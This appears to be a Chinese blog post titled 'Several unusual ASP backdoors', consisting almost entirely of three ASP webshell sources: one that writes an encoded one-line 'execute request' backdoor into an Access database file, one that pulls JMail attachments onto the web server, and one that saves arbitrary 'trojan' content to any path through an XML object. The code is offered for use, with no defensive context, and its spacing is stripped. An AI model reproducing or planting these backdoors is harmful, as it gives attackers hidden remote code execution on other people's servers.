几种另类的ASP后门
2018-09-06 12:12
<%
codebynetpatch
dimdbfile,sql
db=netpatch.asp
dbfile=server.MapPath(db)
setydb=server.CreateObject(ADOX.Catalog)
ydb.CreateProvider=Microsoft.Jet.OLEDB.4.0;DataSource=&dbfile
setydb=nothing
iferr.number=0then
Response.Writedbfile&创建成功<br>
else
Response.Write创建失败,原因:&err.description
Response.End
endif
Conn.OpenProvider=Microsoft.Jet.OLEDB.4.0;DataSource=&dbfile
sql=CREATETABLEfdata([data]Memo)
conn.execute(sql)
Setrs=CreateObject(ADODB.RecordSet)
rs.OpenFData,conn,1,3
rs.addnew
rs(data)=┼攠數畣整爠煥敵瑳∨≮┩>(注释记得去掉!一句话后门executerequest(“n”))
rs.update
%>
用Jmail写文件进硬盘
<%
codzbykEvin1986[S4T]
User=Request.Form(User)
Pass=Request.Form(Pass)
Popserver=Request.Form(Popserver)
ifUser<>andPass<>andPopserver<>then
Setobjmail=CreateObject(JMail.POP3)
objmail.ConnectUser,Pass,Popserver
Setobjmsg=objmail.Messages.item(1)
separator=,
response.writeAttachmentNameis:&SaveAtta&<br>
objmail.Disconnect
Endif
FunctionSaveAtta()
SetAttachments=objmsg.Attachments
separator=,
response.writeThesizeofthisAttachmentis:&objmsg.size&<br>
Fori=0ToAttachments.Count-1
Ifi=Attachments.Count-1Then
separator=
EndIf
SetTheatta=Attachments(i)
Theatta.SaveToFile(Server.Mappath(.)&\&Theatta.Name)
Response.writeOh!HeyGuy.....ThatsOK!
Next
EndFunction
%>
<Html>
<Head>
<Title>JmailSaveFileShell</Title>
</Head>
<Body>
<Center>
<FormMethod=POST>
User:<inputname=Usertype=textvalue=kevin1986><br>
Pass:<inputname=Passtype=textvalue=1986lovinghuan><br>
<inputtype=submitvalue=GettheAttachmentsOftheFirstMail>
</Form>
</Center>
</Body>
</Html>
利用xml写马
<%onerrorresumenext%>
<formid=form1name=form1method=postaction=>
<p>木马内容</p>
<p><textareaname=flashboycols=80rows=10></textarea></p>
<p>路径</p>
<p><inputname=textfieldtype=textsize=50/></p>
<p><inputtype=submitname=Submitvalue=提交/></p></form>
<p><%Response.write本文件绝对路径%>
<%=server.mappath(Request.ServerVariables(SCRIPT_NAME))%></p>
<%
dimxmlString
dimxmlDoc
xmlString=Request(flashboy)
setxmlDoc=server.createObject(Msxml2.DOMDocument)
xmlDoc.loadXml(xmlString)
f=Request(textfield)
xmlDoc.save(f)
setxmlDoc=nothing
%>
上一篇:一个免费的邮件列表源程序(二)